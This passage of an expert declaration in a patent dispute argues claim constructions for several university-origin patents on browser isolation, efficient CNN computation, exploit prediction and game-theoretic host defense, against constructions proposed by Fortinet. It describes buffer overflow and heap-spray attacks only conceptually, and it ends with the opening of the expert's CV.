at 6:14. "That is because the type descriptor for [$C_1$] specifies that an instance with a different type from that of the launcher (Google Chrome in this example) should be used." *Id.* at 6:14–17. For any URL listed in class $C_2$ (such as www.ebay.com) on the other hand, " a new instance of Google Chrome will be launched to handle the request regardless of the browser type used to initiate the request." *Id.* at 6:21–25. Thus, browser instance type refers to the type of browser that is permitted or desired for the desired URL. This functionality enables the '721 patent to classify any sensitive information as a COI that requires a private browser instance. The central idea of the '721 patent is that "sensitive information" should be quarantined—in a sense—from any other online information by using a different browser instance to provide an extra layer of security. In my opinion, in light of the specification of the '721 patent, a POSITA would have had no issue understanding the meaning of the term "sensitive information" (such as, e.g., banking information) within a reasonable scope because "sensitive information" is a well-known term of the art in the fields of computers and cybersecurity.

69. Thus, in summary, "to manage by the rules" simply means that the system evaluates the user-defined COI rules to determine (1) whether the website to be accessed is in the list of websites with "sensitive information" such as for example banking websites (*see e.g.*, '721 patent, fig. 3, and 6:3–25 (showing COI class C1 including AmEX, BoA, and US Bank)); and (2) whether the website is to be opened

in a specific browser type (*see e.g.*, ’721 patent at 5:51–66 (explaining the browser type rule)). In the context of claims 7 and 12, a POSITA would readily understand that the claimed daemon program evaluates these rules to manage whether an existing browser instance can handle the incoming user request, or whether a new browser instance is needed and what type it should be.

## V. THE ’831 PATENT

### A. Technical Background

70. The ’831 patent is part of a broader ASU-originated cybersecurity portfolio managed by Skysong. The portfolio addresses complementary aspects of cybersecurity and security analytics, including secure browsing, threat mitigation, dark web intelligence labeling, vulnerability exploitation prediction, and efficient machine learning techniques used in modern security systems. It was developed by Arizona State University researchers as part of a broader research program addressing cybersecurity problems from multiple angles, including threat mitigation, secure browsing isolation, dark-web intelligence gathering and labeling, vulnerability exploitation prediction, and related machine-learning and computational techniques used in modern security systems.

71. My below discussion pertains to the state of the art at the time of the invention of the ’831 patent unless specifically indicated otherwise.

72. The ’831 patent, titled “Cascaded Computing For Convolutional Neural Networks,” is a continuation of U.S. Patent Application No. 16/335,775, which in turn claims priority through PCT/US2017/052736 to U.S. Provisional Patent Application No. 62/399,753, filed September 26, 2016. The patent addresses the high computational cost of conventional convolutional neural networks (“CNNs”) by reducing total computation without sacrificing classification accuracy. ’831 patent at 1:21–31. In general terms, the claims recite performing iterative, MSB-based approximate computations across multiple data sets, identifying a maximum value, then performing a full-precision computation only for the data set exhibiting that maximum and propagating that full-precision result forward in the network. *Id.* at 1:32–2:40.

73. The ’831 patent teaches techniques “for efficiently reducing the amount of total computation in convolutional neural networks (CNNs) without affecting the output result or classification accuracy. Computation redundancy in CNNs is reduced by exploiting the computing nature of the convolution and subsequent pooling.” ’831 patent at abstract.

74. The prior art suffered from complex problems. For example, CNNs “have gained popularity in many computer vision applications (image, video, speech, etc.), because of their ability to train and classify with high accuracy. Due to multiple layers of convolution and pooling operations that are compute-/memory-intensive,

it is difficult to perform real-time classification with low power consumption on today's computing systems." '831 patent at 1:22–29.

75. To address these shortcomings of the prior art, the '831 patent discloses a "technique for efficiently reducing the amount of total computation in CNNs without affecting the output result or classification accuracy." '831 patent at 1:34–36.

76. One embodiment of the '831 patent teaches "in one or more layers of a convolutional neural network (CNN), performing a first iteration that includes computing a value based on a first set of most significant bits (MSBs) for each of a plurality of data sets; examining a first set of values computed for the plurality of data sets in the first iteration to determine whether a maximum value is present among the first set of values; responsive to identifying the maximum value, performing a full precision computation of the value for a data set, of the plurality of data sets, that exhibited the maximum value; and propagating the full precision computation of the value to a subsequent layer of the CNN." '831 patent at 1:39–50.

77. In summary, the '831 patent teaches that a highly innovative "MSB-driven convolution may produce similar results given that the lower precision bits in the data set would not have altered the maximum determination computation even if they had been included in the original computation. Accordingly, implementations initially perform a minimal amount of computation to determine and compare

maximums among the data sets, and avoid the initial full convolution performed by conventional CNNs." '831 patent at 5:24–32.

### B. A Person Of Ordinary Skill In The Art

78. My opinions, as they relate to the '831 patent in this declaration, are based on the understanding of a POSITA at the time of the invention of the claims in the '831 patent.

79. In my opinion, a person of ordinary skill in the art at the time of the filing of the '831 patent would have at least a Bachelor's degree in computer science (CS) or computer engineering (CE), and 2–4 years of experience working in the field of software development, distributed systems, or artificial intelligence (AI). A graduate degree in CS, CE, data science, AI, or software engineering may be substituted wholly or in part for work experience.

80. I am very familiar with this level of skill at the relevant time. Over my decades of experience, I have supervised and worked with engineers in the relevant fields having at least the level of skill identified above. In my opinion I qualify as a POSITA with respect to all three patents discussed herein at the time of invention.

### C. Claim Constructions

#### *1. "performing a full precision computation of the value for a data set"*

81. It is my understanding that Fortinet asserts that a "full precision computation" as set forth in Claim 1 of the '831 patent means "performing a full

convolution for a data set identified using the value calculated from a [first/second] set of most significant bits for a data set." I disagree. Fortinet's construction unduly narrows the claim term by substituting "convolution"—which is a specific type of computation—for the broader more general term "computation." I see no support in the claims, specification, or prosecution history to so narrow the claim.

82. As a starting point, I do not see any basisfor substituting "convolution" for "computation" in the claimed phrase "precision computation of the value." That change alone narrows the claim term and excludes preferred embodiments. Specifically, the '831 patent discloses an embodiment where "the first iteration computes a value that approximates the full precision computation of the value, and the full precision computation is performed only on the data set that exhibited the maximum." '831 patent, 4:4–9. A "convolution" is only one type of computation that could be used. Fortinet's substitution of "convolution" for "computation" excludes any other type of computation that may be used, such as activation, normalization, flattening, back-propagation, and pooling or padding (e.g. adding zeroes or other values to the actual input data so that the size of the output matrix remains the same as the input matrix after the neural network has completed a single layer of computation). *See* https://deepai.org/machine-learning-glossary-and-terms/padding.

83. More importantly, Fortinet's proposed construction inappropriately reads out pooling, a type of computation that is different from convolution and that is expressly disclosed: "the computing in each of the first iteration and the second iteration employs a convolution and a pooling; the convolution is a N×N convolution, where N is any integer; the pooling is a N×N pooling, where N is any integer; the convolution is a 3×3 convolution, and the pooling is a 2×2 pooling." '831 patent, 1:65–2:3.

84. The '831 provides support for this claim language. For example:

> In general, innovative aspects of the subject matter described in this specification can be embodied in methods that include actions of: in one or more layers of a convolutional neural network (CNN), performing a first iteration that includes computing a value based on a first set of most significant bits (MSBs) for each of a plurality of data sets; examining a first set of values computed for the plurality of data sets in the first iteration to determine whether a maximum value is present among the first set of values; responsive to identifying the maximum value, **performing a full precision computation of the value for a data set, of the plurality of data sets, that exhibited the maximum value**; and propagating the full precision computation of the value to a subsequent layer of the CNN.

'831 patent at 1:37–50 (emphasis added); *see also*

> the CNN is employed to analyze an image; the first iteration computes a value that approximates **the full precision computation of the value**; and/or the full precision computation is performed on the data set the includes less data than the plurality of data sets.

'831 patent at 2:6–10 (emphasis added); *see also*

> Implementations perform approximate computations of neural networks (e.g., based on the MSBs), make a decision based on the approximate results which data set to proceed with, and then (e.g., only) perform the more fine-

> grain, full precision, (e.g., more accurate) computations on the narrowed-down set of data that exhibited the maximum. Accordingly, the first iteration computes a value that approximates the full precision computation of the value, and the full precision computation is performed only on the data set that exhibited the maximum, that data set including less data than the entire plurality of data sets

’831 patent at 3:65–9 (referring to “full precision” not “full convolution”).

85. It is therefore my opinion that rewriting the claim language from “performing a full precision computation” to “performing a full convolution” as proposed by Fortinet is unsupported. A POSITA would readily understand the claim language as written. Thus, the plain and ordinary meaning should apply.

## VI. THE ’897 PATENT

### A. Technical Background

86. My below discussion pertains to the state of the art at the time of the invention of the ’897 patent unless specifically indicated otherwise.

87. The ’897 patent teaches advanced artificial intelligence algorithms for assessing the likelihood of exploitation of software vulnerabilities by malicious hackers and predicting which software vulnerabilities are likely to be exploited first to prioritize patching. ’897 patent at abstract and 1:24–28.

88. The ’897 patent first describes the known problem, i.e., the ever increasing number of software vulnerabilities that are discovered and publicly disclosed every year. ’897 patent at 1:32–33. “In 2016 alone, more than 10,000 vulnerability identifiers were assigned and at least 6,000 were publicly disclosed by the National

Institute of Standards and Technology (NIST)." *Id.* at 1:33–36. "Once the vulnerabilities are disclosed publicly, the likelihood of those vulnerabilities being exploited increases." *Id.* at 1:36–38. Indeed, "Verizon reported that over 99% of breaches are caused by exploits to known vulnerabilities." *Id*. at 1:49–50.

89. The time to react to the publication of these vulnerabilities is often critically short. '897 patent at 1:51–53. "For instance, exploits targeting the Heartbleed bug in OpenSSL were detected in the wild 21 hours after the vulnerability was publicly disclosed." *Id*. at 1:53–57. The problem is exacerbated by the sheer number of known vulnerabilities, only ~3% of which may actually be exploited. *Id.* at 1:62– 64; *see also id*. at 4:64–65 ("around 2.4% of the reported vulnerabilities are exploited in real world attacks."); *see also id*., table 3 (vulnerability exploitation probabilities); *id.* at 13:50–51 (referencing "notable variations on the exploitation likelihood").

90. For these reasons, there is a critical need "to efficiently assess vulnerabilities that will be exploited in the wild while keeping the false alarm rate low." '897 patent at 1:57–59.

91. The known prior art has many shortcomings. For example, standard risk assessment systems provided by software makers, such as "Common Vulnerability Scoring System (CVSS), Microsoft Exploitability Index, and Adobe Priority Rating are overly cautious and report "many vulnerabilities as 'severe' and 'will be

exploited'." '897 patent at 1:41–45. However, since "only a small fraction of those vulnerabilities (less than 3%) are found to be exploited in the wild" (*id.* at 1:62–64), these identifications do "not alleviate the problem much since the majority of the flagged vulnerabilities will not be attacked." *Id.* at 1:45–47. "Further, previous work has found that the CVSS score provided by NIST is not an effective predictor of vulnerabilities being exploited." *Id.* at 1: 63–67.

92. Other prior art has explored "the use of social media, darkweb markets and certain white-hat websites" to attempt to prioritize vulnerabilities. '897 patent at 1:67–2:2. However, "methodical concerns on the use of social media for exploit prediction were recently raised; data feeds for proactive exploit prediction were limited to single sites that provided a relatively small number of predictions." *Id*. at 2:4–7. Notably, other work has "demonstrated the viability of data collection but does not quantify the results of prediction." *Id*. at 2:8–9.

93. The invention of the '897 patent directly addresses these problems. Specifically, the '897 patent examines the ability to predict exploits in the wild "using cyber threat intelligence feeds comprised from a variety of data sources or data feeds." '897 patent at 3:27–29. This is "of direct relevance to patch prioritization." *Id*. at 3:30.

94. One specific important advantage of the '897 patent is its ability to analyze and rely on a variety of data sources or data feeds. "Many sources of data were

identified that were representative of current threat intelligence used for vulnerability prioritization-examples being presented in FIG. 13." *Id*. at 3:8–41, Fig. 13.

95. For example, the '897 patent discloses "Embodiment A" which examines three sources (ExploitDB (EDB), Zero Day Initiative (ZDI) by TippingPoint, and a collection of information scraped from over 120 sites on the darkweb and deepweb (DW)). '897 patent at 3:42–50. The second embodiment "Embodiment B" utilizes "a database of 46 darkweb and deepweb forums collected from the same data collection infrastructure used by embodiment A," but over a longer time period of data. *Id.* at 9:50–55.

96. In summary, the '897 patent teaches training a machine learning model where the training data consists of multiple datasets (going beyond NVD) on vulnerability information, and multiple datasets on hacker communications. (The '897 patent describes the use of over 40 hacker websites. '897 patent at 9:50–53. The features in this dataset include explicit data, metadata, and social connections. Further, the '897 patent uses special measures of the social connections relying on ideas of social science theory. The patent notes that the model is trained on data that occurred prior to when the vulnerability was exploited, and there is also data prior to the disclosure date. The target of the prediction is well-defined as evidence of exploits that occur in the wild, as opposed to exploits that are developed as "proof

of concept." The '897 patent further uses proof-of-concept exploit information to predict the exploits in the wild, and it teaches multiple different classifications of likelihood of exploitation, such as "not likely," "likely," "extremely likely."

### B. A Person Of Ordinary Skill In The Art

97. My opinions, as they relate to the '897 patent in this declaration, are based on the understanding of a POSITA at the time of the invention of the claims in the '897 patent.

98. In my opinion, a person of ordinary skill in the art at the time of the filing of the '897 patent would have at least a Bachelor's degree in CS, data science/engineering, or cybersecurity, and 2–4 years of experience working in the field of software development, AI, ML, data mining, or cybersecurity. A graduate degree in CS, AI, data science/engineering, cybersecurity, or software engineering may be substituted wholly or in part for work experience.

99. I am very familiar with this level of skill at the relevant time. Over my decades of experience, I have supervised and worked with engineers in the relevant fields having at least the level of skill identified above. In my opinion I qualify as a POSITA with respect to all three patents discussed herein at the time of invention.

### C. Claim Constructions

#### *1. "social connections"*

100. It is my understanding that Fortinet asserts that "social connections" as set forth in Claim 1 of the '897 patent should be interpreted as "the in-degree and out-

degree a given user has to other active users in the social network." I agree that this construction, along with its equivalents, properly interprets the meaning of this claim term. Indeed, I have proposed this construction to a technical audience in a related IPR proceeding of the '897 patent. *See* IPR2025-1170, Ex. 2016, Corrected Declaration of Nenad Medvidovic Ph. D., in Support of Patent Owner's Preliminary Response, ¶103.

101. In my opinion, in the context of the '897 patent, a POSITA would understand the plain and ordinary meaning of the term "social connections" as "connections of a user to other users in a social network," or, alternatively, as "connections of a user to other users in a graph representing a social network," based at least on the disclosures of the specification of the '897 patent. These meanings are synonymous with "the in-degree and out-degree a given user has to other active users in the social network" which I proffered in my declaration in support of Patent Owner's preliminary response in IPR2025-1170. IPR2025-1170, Ex. 2016, Corrected Declaration of Nenad Medvidovic Ph. D., in Support of Patent Owner's Preliminary Response, ¶103; *see id.* ¶¶102-08.

102. As I stated in my prior declaration in IPR2025-1170, the '897 patent analyzes much data extracted from various darkweb and deepweb sources (collectively "DW"). This data is used to identify "a set of features computed from the social network structure of users posting in a forum." '897 patent at 11:18–22.

> [These DW social network features] contain[] measures computed from the *__social connections__* of users posting hacking-related content. The basic social network features (e.g., in-degree, out-degree) indicate how connected a user is in the social graph. More advanced features measure the centrality of users in the social graph. Highly central users are more important; thus the vulnerability mentions should take more consideration. The features were computed for the set of users who explicitly mentioned one or more CVE-IDs in their posts.

’897 patent at 11:29–38.

103. The ’897 patent provides great detail about its use of these social network measures with respect to Network Structure, Centrality Measures, and Importance Measures:

> Social Network Measures (Embodiment B)
>
> After creating the social network, measures are computed derived from the network structure. In this disclosure, three categories of social network measures are considered:
>
> Network Structure Measures: the measures under this category are: (1) In-degree: the number of edges pointing to the user, (2) Out-degree: the number of edges originated from the user, (3) Sum of In-degree weights: the sum of the weights for all edges pointing to the user, (4) Sum of out-degree weights: the sum of the weights for all edges pointing away from the user. These measures describe the type of activities in which the user engages. For example, higher in-degree than out-degree may indicate the user tendency towards creating new topics or posting under topics short time after they are created.
>
> Centrality Measures: three measures are computed: (1) In-degree centrality: it measures the popularity of a user vi by normalizing vi's in-degree by the maximum possible in-degree, (2) Out-degree centrality: measures how actively a user vi replies to others by normalizing vi's out-degree measure by the maximum possible out-degree, (3) Betweenness centrality: for a user vi, Betweenness centrality measures the importance of vi by computing the fraction of shortest paths between all pairs of users that pass through vi.

> Importance Measures: the number of connections user vi has with other users, by itself, may not be indicative of importance; rather, vi is important if his/her posts make other important users reply. Hence, influence metrics incorporate the centrality of users with outgoing edges to vi into Ids centrality (i.e., if an important user vj replies to vi, then the importance of vi increases). Two measures are computed under this category: (1) Eigenvector centrality: measures the importance of vi by assigning a centrality proportional to the sum of in-neighbors' centralities. Eigenvector centrality of vi is the ith value of the eigenvector Ce corresponding to the largest eigenvalue of the network adjacency matrix At, and (2) Pagerank centrality: measures the centrality of vi by incorporating fractions of the centralities of in-neighbors, such that each of vi's in-neighbors passes the value of his/her centrality divided by the number of outgoing edges..

’897 patent at 21:6–47..

104. This “social feature” information, including “social connection” metrics, are used, for example, to determine “Importance Measures.” ’897 patent at 21:31–46. These ‘influence metrics’ aim to incorporate the “centrality of users” in the relevant social metric to assign weight to communication to or from that user. For example, the patent discloses “Eigenvector centrality” and “Pagerank centrality” to evaluate the importance of the retrieved data. *See id.*

105. The ’897 patent explicitly defines in-degree and out-degree as the number of edges pointing to the user (in-degree) and the number of edges originated from the user (out-degree). ’897 patent at 21:12–14. Determining the in- and out-degree requires first building a graph in which the users are nodes and the connections between users are vectors from one node (user) to another). In my opinion, a POSITA would have understood that in-degree for a graph refers to the number of

incoming edges (e.g., relationships) that point in towards a node, which demonstrates how many other nodes are connected to a specific node. A POSITA also would have understood that out-degree for a graph refers to the number of outgoing edges pointing outwards from node, which demonstrates how the connections a specific node has to other nodes.

106. A graph, simply put, is a mathematical concept that describes the connections of nodes, be those nodes users, persons, or some other type of objects, to other nodes via connection lines or links known as edges. A simple everyday example of a graph is a family tree, which demonstrates the familial relationships or connections (i.e., edges) a person (in this case, the node) with other persons (other nodes). For example, the connections (edges) between a father (first node), a mother (second node), and a child (third node). A simple explanation of a graph database, which may model data as a network of connected entities and relationships, is available at https://learn.microsoft.com/en-us/fabric/graph/graph-database, attached as a printout as **Appendix U**.

107. In my opinion, a POSITA would have understood at the relevant time that such a database is commonly used to represent users as nodes and connections between users as edges between the nodes. The paper *Suggesting Friends Using The Implicit Social Graph*, Roth et al. similarly supports that a POSITA would know that edges are the connection between users and that "edge weights are determined

by the frequency, recency, and direction of interactions between users and their contacts and groups." Roth et al., *Suggesting Friends Using The Implicit Social Graph*, KDD '10: The 16th ACM SIGKDD International Conference on Knowledge, 25 July 2010 (attached as **Appendix V**).

108. However, given the different audience—a non-technical jury, I believe a construction that is identical in scope but worded in less technical language is preferrable. Thus, I would construe the term "social connections" as "connections of a user to other users in a social network" along with its equivalent metrics. As stated, this phrase is synonymous with "the in-degree and out-degree a given user has to other active users in the social network," but better suited to the non-technical audience in this proceeding. Likewise, construing the term "social connections" as "connections of a user to other users in a graph representing a social network" would also be synonymous with "the in-degree and out-degree a given user has to other active users in the social network," with slightly more technical language with the inclusion of "a graph representing" within the construction.

## VII. THE '385 PATENT

### A. Technical Background

109. My below discussion pertains to the state of the art at the time of the invention of the '385 patent unless specifically indicated otherwise.

110. The ’385 patent teaches various system and methods for a data-driven security game framework that models an attacker based on exploit market data actively mined from the darknet to develop strategies for the defender. ’385 patent at abstract.

111. Generally, the ’385 patent notes that “given a system configuration (or a distribution of system configurations within an organization), the present disclosure models an attacker who, given a budget, will purchase exploits to maximize his level of access to the target system.” ’385 patent at 2:63–66. “Likewise, a defender will look to adjust system configurations in an effort to minimize the effectiveness of an attacker while ensuring that necessary software dependencies are satisfied.” ’385 patent at 2:67–3:3.

112. Based on this intuitive insight, the ’385 patent addresses what exploits an attacker will likely use and what software in the organization poses the biggest threat. ’385 patent at 1:45–49. To achieve these objectives, the ’385 patent discloses a “game theoretic approach to host-based defense where the activities of the attacker are informed from an ‘un-conventional’ source (information not directly related to the defender’s system)—specifically, information from darknet markets. ’385 patent at 2:26–31 and 3:6–7.

113. To accomplish this objective, the ’385 patent discloses “ a security game where the attacker **102** is a malicious hacker with access to a darknet exploit

markets **104** and the defender **106** is tasked with host-based defense." *Id.* at 3:16–19. In this framework, "the notation V is used [] to represent the entire set of vulnerabilities within a given computer system." *Id*. at 3:20–22.

114. The '385 patent further teaches that "in a real-world organization, system administrators are not able to patch all vulnerabilities for a variety of reasons. Software dependencies, use of legacy systems, and non-availability of patches are some examples." *Id.* at 3:25–29.

115. To model this, a 'constraint set' (denoted C) is defined as a subset of V." *Id*. at 3:29–30. This constraint set is the set of vulnerabilities that cannot be avoided, because avoiding these vulnerabilities would limit the functionality of the computer network below acceptable levels. *Id.* at 3:30–32 ("The vulnerabilities in a constraint set represent the vulnerabilities required for some system functionality.").

116. The '385 patent then defines "C" as the "set of all possible constraint sets." *Id.* at 3:36–37. "Each constraint set in $C_i$, represents a set of vulnerabilities that together will provide complete functionality of application i." *id.* at 3:39–41. If "at least one constraint set in $C_i$ is satisfied, application i will properly operate on the system." *Id.* at 3:43–45. Therefore, since "C is the set of all application constraint sets for a given system configuration", it "represents all of the applications to be run on the system." *Id*. at 3:45–47. "In this framework, for a given system, a system administrator selects which vulnerabilities may be present in order to allow each

application i to function." *Id.* at 3:47–50. The '385 patent teaches how the system administrator can then choose the proper constraint set that minimizes the vulnerabilities that are most likely to be attacked, by comparing the possible vulnerability constraint sets to the vulnerabilities associated with the set of exploits determined to be most likely used in an attack.

117. In summary, the '385 patent teaches a highly innovative method of allowing a computer administrator to configure a computer system to be protected in such a way that the set of vulnerabilities exposed by the computer system are minimized in comparison with the set of vulnerabilities that an attacker is most likely to exploit.

### B. A Person Of Ordinary Skill In The Art

118. My opinions, as they relate to the '385 patent in this declaration, are based on the understanding of a POSITA at the time of the invention of the claims in the '385 patent.

119. In assessing the level of skill of a POSITA, I have considered the type of problems encountered in the art, the prior solutions to those problems found in the prior art references, the rapidity with which innovations are made, the sophistication of the technology, the level of education of active workers in the field, and my own experience working with those of skill in the art at the time of the invention.

120. In my opinion, a person of ordinary skill in the art at the time of the filing of the '385 patent would have at least a Bachelor's degree in CS, computer engineering, or cybersecurity, and 2–4 years of experience working in the field of software development, distributed systems, and cybersecurity. A graduate degree in CS, computer engineering, AI, cybersecurity, or software engineering may be substituted wholly or in part for work experience.

121. I am very familiar with this level of skill. Over my decades of experience, I have supervised and worked with engineers in this field having at least the level of skill identified above.

### C. Claim Constructions

#### *1. "minimum set of dependencies" (claims 1, 8, and 15)*

122. I understand that Fortinet asserts that the term "minimum set of dependencies" as set forth in Claims 1, 8, and 15 of the '385 patent is indefinite based on the argument that the patent provides insufficient guidance as to the objective boundaries of this claim language. I disagree for multiple reasons.

123. **First**, the '385 patent sets forth sufficient explanation of the invention and this term in particular to allow a POSITA to understand the scope of this claim term with reasonable certainty. Specifically, the '385 patent recognizes that "in a real-world organization, system administrators are not able to patch all vulnerabilities for a variety of reasons. Software dependencies, use of legacy systems, and non-

availability of patches are some examples." *Id.* at 3:25–29. To model these dependencies, the '385 patent first introduces the notation "V" "to represent the entire set of vulnerabilities within a given computer system." '385 patent at 3:20–22. Then, a "'constraint set' (denoted C) is defined as a subset of V." *Id.* at 3:29–30. "The vulnerabilities in a constraint set represent the vulnerabilities required for some system functionality." *Id.* at 3:30–32. Thus, the claimed "constraint set" comprising the "minimum set of dependencies to operate the computer system" is the set of vulnerabilities that cannot be avoided, because avoiding these vulnerabilities would limit the functionality of the computer network below acceptable levels, i.e., required applications would not be able to run. This is useful to prioritize the exploits of those particular vulnerabilities (that cannot be avoided) against which a system administrator will most need to guard. Thus, a POSITA would understand that the term "minimum set of dependencies" relates to the claimed "constraint set" and refers to the set of vulnerabilities that cannot be avoided in a computer system with the necessary minimal functionality.

124. **Second**, the specification use of the term confirms this understanding. For example, the specification explains that in response to "an attacker who, given a budget, will purchase exploits to maximize his level of access to the target system," "a defender will look to adjust system configurations in an effort to minimize the effectiveness of an attacker while ensuring that necessary software dependencies are

satisfied." '385 patent at 2:65–3:3. A POSITA would understand that the referenced "necessary software dependencies" are the "minimum set of dependencies" required for minimal necessary functionality of the computer system. In other words, the invention determines the minimal set of dependencies to identify which vulnerabilities cannot be avoided. Generally, a POSITA would understand that for every computer system, there are competing possible configurations to provide minimal desired functionality. Each possible configuration would necessarily include certain vulnerabilities. The system administrator is thus able to choose the configuration that (1) includes the least number of vulnerabilities and (2) aims to avoid the vulnerabilities that are most likely to be exploited. That is the purpose of creating the constraint set of the computer system which comprises a "minimum set of dependencies to operate the computer system."

125. **Third**, the examiner had no problem understanding this term. Indeed, the examiner himself added an amendment for "creating a constraint set of vulnerabilities of the computer system from the set of vulnerabilities *comprising a minimum set of dependencies to operate the computer system*, wherein application of the set of exploits on the computer system comprises determining the effect of the set of exploits on the constraint set of vulnerabilities of the computer system." File History of U.S. Patent No. 10,313,385 ("'385 Patent File History") at 138.

126. Thus, it is my opinion that a POSITA would readily understand the term “minimum set of dependencies” with reasonable certainty.

### *2. “exploits of a computer system” / “exploits” (claims 1, 8, 15)*

127. I understand that Fortinet asserts that the terms and “exploits” and “exploits of a computer system” as set forth in Claims 1, 8, and 15 of the ’385 patent should be construed as “source code or executable software designed to leverage a vulnerability in a computer system.” I disagree. This proposed construction unduly narrows the term “exploit” to “source code” (i.e., static representation) or “executable software” (i.e., dynamic representation) of the system’s implementation. In my opinion, a POSITA would understand that there are manifold types of exploit not limited to source- or executable code, such as for example exploits embodied in data (e.g., enter X sequence of characters to break into the system), or a sequence of commands (e.g., do X, click on Y, and then enter data Z).

128. My understanding is supported by the specification which refers to exploits generally (including all types of exploits) in passim. *See e.g.*, abstract (referring to any “exploit market data”); 1:27–45 (general reference to the “market for exploit kits”); 2:66 (reference to purchasing exploits generally); 3:53–55 (reference to “all possible exploits” without limitation); 7:45–49 (listing various darkweb hacking tools without limitation); and 8:19–20 and table 2 (listing “exemplar exploits” open ended).

129. The only references to "executable" code in the patent do not pertain to exploits, but to the computer system's capability generally (10:32–36), processors and processing units generally (10:51–56), data storage devices storing "computer executable instructions" (11:4–11), machine readable media (11:35–45 and 12:61–65). "Source code" is referenced only once regarding the sample darknet Market product GrovRAT. 1:64. Thus, exploits are not limited to only source- or executable code in the specification.

130. This is further confirmed by much extrinsic examples of non-source code and non-executable software exploits. For example, attacks based on stack overflow and heap spray attacks exploit computer languages in which an input. In my opinion, a POSITA would know that various exploits such as stack over flow and heap spray attacks go beyond Fortinet's construction requiring source- or executable code. For example, in a blog post entitled "What is buffer overflow?"[12] (**Appendix W**), a buffer overflow exploit is described as is "an anomaly that occurs when software writing data to a buffer overflows the buffer's capacity, resulting in adjacent memory locations being overwritten" that "can be exploited by attackers with a goal of modifying a computer's memory in order to undermine or take control of program execution." An exploit attacker "deliberately feed[s] a carefully crafted input into a

[12] Available at https://www.cloudflare.com/learning/security/threats/buffer-overflow/.

program that will cause the program to try and store that input in a buffer that isn't large enough, overwriting portions of memory connected to the buffer space. If the memory layout of the program is well-defined, the attacker can deliberately overwrite areas known to contain executable code" and "then replace this code with his own executable code." *Id.*

131. A POSITA would understand that a buffer overflow attack uses a purposely oversized stack *input* to *then* a sequence that results in running some other malicious code, commonly known as stack smashing. In my opinion, a POSITA would understand that this *input* is not "source code or executable software" as Fortinet's construction requires, but rather a purposely oversized stack *input* that takes advantage of default stack executions mechanics to corrupt data, crash programs, and/or hijack an execution flow as an attacker desires. A POSITA would understand that a buffer overflow attack is not merely a single piece of executable code, but rather a technique used to inject and execute malicious code that exploits programming flaws to overflow memory, allowing attackers to overwrite valid program instructions with their own.

132. In addition, the paper *NOZZLE: A Defense Against Heap-spraying Code Injection Attacks*, Ratanaworabhan et al., describes heap spraying as "a security attack that increases the exploitability of memory corruption errors in type-unsafe applications" in which "an attacker coerces an application to allocate many objects

containing malicious code in the heap, increasing the success rate of an exploit that jumps to a location within the heap." Ratanaworabhan et al., *NOZZLE: A Defense Against Heap-spraying Code Injection Attacks*[13] (**Appendix X**) at 1. As the paper notes, because of security improvements at the time of the paper including "prevention measures in runtime environments and operating systems," "attacks that focus on exploiting memory corruptions in the heap are [] popular." *Id.*

133. In my opinions, similarly to the buffer overflow attack described above, a POSITA would understand that a heap spray attack is not itself directly executable code in the sense of a standalone program. A POSITA would instead understand that a heap spray attack is a data injection technique that works by forcing a program to allocate large, predictable blocks of memory onto the heap. This fills the program memory with a payload that turns memory safety violations into reliable, arbitrary code execution. For example, filling a heap with malicious patterns (e.g., shellcode combined with a NOP or No-Operating sled that directs CPU execution flow) that make it easier for an attacker to redirect control flow to a specific memory location. In my opinion, a POSITA would understand that a heap spray attack is not strictly "source code or executable software" as Fortinet's construction requires, but rather an exploit technique that overloads a heap with code that increases the chances of a malicious payload being executed, typically after a separate vulnerability, such as a

[13] Available at https://css.csail.mit.edu/6.858/2011/readings/nozzle.pdf.

buffer overflow attack, is used to hijack an instruction pointer to point to the sprayed memory area.

134. As another example, the Symantec paper, Wueest et al., *ISTR: Living Off the Land and Fileless Attack Techniques*[14] (**Appendix Y**), describes on page 4 living off the land and fileless attacks as a "memory-only threats, fileless persistence," and "non-PE file attacks." *See id.* at 7 ("The same is true for memory only shellcode dropped by an exploit, which does not write any files on disk."). With respect to non-PE[15] file attacks, such as "Document macro[s]" in files such as Word (.docx) or Portable Document Format (.pdf), to the extent Fortinet interprets such document macros to not be an "exploit" because Fortinet does not consider these to be "source code or executable software," I disagree. In my opinion, a POSITA would understand non-PE file attacks including, for example, Word .docx files that include malicious macros, to be an exploit, as demonstrated by this Symantec paper, **Appendix Y**.

135. Finally, while the concept of an "exploit" is central to the invention, the novel aspect of the invention is not what an exploit is, or even how to identify one, but instead, *how the computer system is reconfigured to minimize the likely impact*

---

[14] Available at https://docs.broadcom.com/doc/istr-living-off-the-land-and-fileless-attack-techniques-en.

[15] PE refers to portable executable, such as .exe (executable), .dll (dynamic-link library), and .sys (Windows system file, often a device driver or system configuration file).

*of the exposed vulnerabilities*. The plain and ordinary meaning of the term "exploit," which generally speaking would be a method, tool, data, or code fragment designed to take advantage of a vulnerability in a computer system, is sufficient to understand the context of these claims. Thus, in my opinion, the "exploit" terms should simply be construed as plain and ordinary meaning.

## VIII. CONCLUSION

136. Based on the analysis I have conducted in light of the patents and Fortinet's claim construction arguments, and for the reasons set forth herein, I have reached the conclusions and opinions in this declaration. I reserve the right to supplement my opinion and provide additional bases for my opinions as necessary, particularly if Fortinet raises new arguments or interpretations, or if any other new information becomes available to me during this proceeding.

137. In the event of a hearing or trial in this matter, I may create and/or use various exhibits for the purposes of demonstrating my testimony as discussed in this declaration. I have not yet created or identified any demonstrative exhibits for this purpose.

I, Nenad Medvidovic, Ph.D., under the penalty of perjury under the laws of the United States, declare that the foregoing is true and correct based on the best of my ability.

Date: 17 February 2026 Signed: ________________________

Nenad Medvidovic, Ph.D.

# APPENDIX A

*Curriculum Vitae* *January 2026*

Nenad Medvidović
*TRW Professor in Engineering*
*Professor and Chair*, Thomas Lord Department of Computer Science
School of Advanced Computing and Viterbi School of Engineering
1031 Downey Way
University of Southern California
Los Angeles, CA 90089-0262 U.S.A.

+1-310-702-3309 (cell)
neno@usc.edu (email)
http://softarch.usc.edu/~neno/ (www)

## Table of Contents

Education 2
Employment and Major Organization Leadership 2
Honors, Awards, Fellowships 3
Selected Statistics 4
Graduated Doctoral Students 4
Publications 5
Research Support 32
Patents 39
Teaching 39
Supervised Students 42
Formal Presentations 45
Professional Service 57
University Service 70
Professional Associations 73
Consulting 73

# 1 Education

**Doctor of Philosophy** (3/99, Cumulative GPA: 4.00)
University of California, Irvine — Department of Information and Computer Science
Dissertation: *Architecture-Based Specification-Time Software Evolution*

**Master of Science** (6/95, Cumulative GPA: 4.00)
University of California, Irvine — Department of Information and Computer Science

